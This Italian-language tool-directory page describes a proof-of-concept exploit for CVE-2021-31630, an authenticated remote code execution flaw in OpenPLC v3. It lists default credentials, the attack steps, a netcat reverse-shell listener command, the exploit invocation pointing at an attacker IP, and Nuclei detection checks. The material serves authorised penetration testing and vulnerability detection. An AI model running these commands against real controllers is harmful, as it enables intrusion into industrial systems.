Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
OpenPLC-CVE-2021-31630-RCE — Python 3.13+ exploit proof-of-concept per CVE-2021-31630, che consente l'esecuzione remota di codice autenticata su OpenPLC v3 tramite il caricamento di un layer hardware malevolo. Include template di rilevamento Nuclei per credenziali predefinite e controlli delle vulnerabilità. | Kitploit
Strumenti/GitHubGitHub/machevalia/openplc-cve-2021-31630-rce
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneSviluppo Payload
GitHubmachevalia/openplc-cve-2021-31630-rce

OpenPLC-CVE-2021-31630-RCE

Python 3.13+ exploit proof-of-concept per CVE-2021-31630, che consente l'esecuzione remota di codice autenticata su OpenPLC v3 tramite il caricamento di un layer hardware malevolo. Include template di rilevamento Nuclei per credenziali predefinite e controlli delle vulnerabilità.

Vedi Repository
3251 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

OpenPLC v3 RCE autenticato (CVE-2021-31630)

Questo è un proof-of-concept moderno compatibile con Python 3.13+ per CVE-2021-31630, una vulnerabilità in OpenPLC v3 che consente a un utente autenticato di caricare un livello hardware personalizzato contenente codice malevolo, portando all'esecuzione remota di codice (RCE) sull'host.

Scoperta originale e advisory della vulnerabilità a cura di Fellipe Oliveira. Questa reimplementazione e modernizzazione utilizza httpx, strumenti CLI, logging e tecniche di rilevamento più sicure.

Panoramica dell'Exploit

  • Vulnerabilità: CVE-2021-31630
  • Componente: Server Web OpenPLC v3
  • Impatto: Esecuzione remota di codice autenticata
  • Credenziali predefinite: openplc:openplc

Flusso dell'Exploit

  1. Effettuare il login con credenziali valide
  2. Caricare codice C malevolo come livello hardware personalizzato
  3. Avviare la compilazione
  4. Avviare l'esecuzione (opzionale)
  5. Ricevere la connessione reverse shell

Utilizzo

  1. Avviare un listener:
root@kitploit:~
nc -lvnp 9001
  1. Eseguire l'exploit:
root@kitploit:~
python3 openplc_rce.py http://target:8080 -lh YOUR_IP -lp 9001

Flag opzionali:

  • -u Nome utente (default: openplc)
  • -p Password (default: openplc)
  • -t Timeout in secondi (default: 20)

Caratteristiche

  • Compatibile con Python 3.13+
  • Realizzato con httpx
  • Supporto logging per output pulito
  • Funzioni modulari per un riutilizzo più semplice
  • Template di rilevamento Nuclei inclusi

Template di rilevamento Nuclei

  1. Controllo credenziali predefinite
root@kitploit:~
nuclei -t nuclei-templates/openplc-default-login.yaml -u http://target:8080
  1. Controllo passivo vulnerabilità RCE
root@kitploit:~
nuclei -t nuclei-templates/openplc-authenticated-rce-check.yaml -u http://target:8080

Il secondo template effettua il login e tenta un caricamento innocuo di payload + compilazione per confermare la probabile vulnerabilità — senza attivare la reale esecuzione del codice.

File inclusi

  • OpenPLC_CVE_2021_31630.py – Exploit Python 3.13+
  • nuclei-templates/openplc-default-login.yaml – Rileva credenziali predefinite
  • nuclei-templates/openplc-authenticated-rce-check.yaml – Rileva comportamento vulnerabile in sicurezza

⚠️ Legale/Etica

Questo codice è destinato esclusivamente a test di sicurezza educativi e autorizzati. Non utilizzarlo senza il permesso esplicito del proprietario del sistema.

Scarica lo strumento